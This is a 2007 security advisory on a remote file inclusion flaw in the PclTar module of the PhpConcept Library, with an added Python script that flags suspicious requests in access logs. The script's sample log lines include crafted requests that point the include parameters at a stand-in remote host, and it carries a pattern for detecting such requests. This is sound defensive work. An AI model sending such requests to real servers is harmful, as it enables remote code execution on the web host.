
PhpConcept.Library.Parameter.g_pcltar_lib_dir.File.Inclusion

Release Date

Aug 02, 2007

Severity

low

Impact

System compromise, remote script execution.

Description

The Vincent Blavet PhpConcept Library has a remote file inclusion vulnerability. The library is used in multiple products, including (1) Joomla! 1.5.0 Beta, (2) N/X Web Content Management System (WCMS) 4.5, (3) CJG EXPLORER PRO 3.3, and (4) phpSiteBackup 0.1. A remote attacker could execute arbitrary script code on the web server with the privileges of the server by sending a specially crafted URL request to the 'pcltar.lib.php' or 'pcltar.php' script, using the 'dir_edge_lang' parameter to specify a malicious PHP file on a remote system.
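Added detection example (not part of the original advisory and not a vendor signature): a Python check that flags web access-log requests to the two scripts named above when a parameter name appearing on this page (title or description) carries a remote location. The combined log format, sample lines, hosts and directory paths are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script and parameter names are taken from this advisory (title and description).
SCRIPTS = ("pcltar.lib.php", "pcltar.php")
PARAMS = {"g_pcltar_lib_dir", "dir_edge_lang"}
# Value that points at a remote resource instead of a local directory.
REMOTE = re.compile(r"^\s*(?:(?:https?|ftps?):|//|\\\\)", re.I)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(log_line):
    """Return [(param, value)] for include parameters carrying a remote location."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(SCRIPTS):
        return []
    # parse_qsl percent-decodes, so encoded schemes (http%3A%2F%2F) are caught too.
    return [(k, v) for k, v in parse_qsl(url.query, keep_blank_values=True)
            if k.lower() in PARAMS and REMOTE.search(v)]


def scan(lines):
    """Yield (line_number, hits) for every log line with at least one hit."""
    for n, line in enumerate(lines, 1):
        hits = suspicious_params(line)
        if hits:
            yield n, hits


# Constructed sample entries (documentation addresses, hosts and paths; not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Aug/2007:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [02/Aug/2007:10:00:07 +0000] "GET /lib/pcltar.lib.php?g_pcltar_lib_dir=http://remote.example/ HTTP/1.1" 200 0',
    '192.0.2.44 - - [02/Aug/2007:10:00:09 +0000] "GET /inc/pcltar.php?dir_edge_lang=hTTp%3A%2F%2Fremote.example%2Fa HTTP/1.0" 200 0',
    '192.0.2.10 - - [02/Aug/2007:10:00:12 +0000] "GET /lib/pcltar.lib.php?g_pcltar_lib_dir=./lib HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {hits}")
```

A hit with a 200 response on an affected version warrants checking the host for follow-on activity; the same match logic can be ported to a WAF or reverse-proxy deny rule.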

Affected Products

Vincent Blavet PhpConcept Library PclTar module version 1.3 and 1.3.1
Joomla! version 1.5.0 Beta and prior
N/X Web Content Management System (WCMS) version 4.5 and prior
CJG EXPLORER PRO version 3.3 and prior
phpSiteBackup version 0.1

Recommended Actions

Currently we are not aware of any official fix for this issue.

Coverage

IPS
VCM

Common Vulnerabilities and Exposures (CVE)

CVE-2007-2199

Reference/s

http://www.securityfocus.com/bid/23780 (BugTraq)
http://www.securityfocus.com/bid/24660 (BugTraq)
http://www.securityfocus.com/bid/23613 (BugTraq)

Reference: VID-14856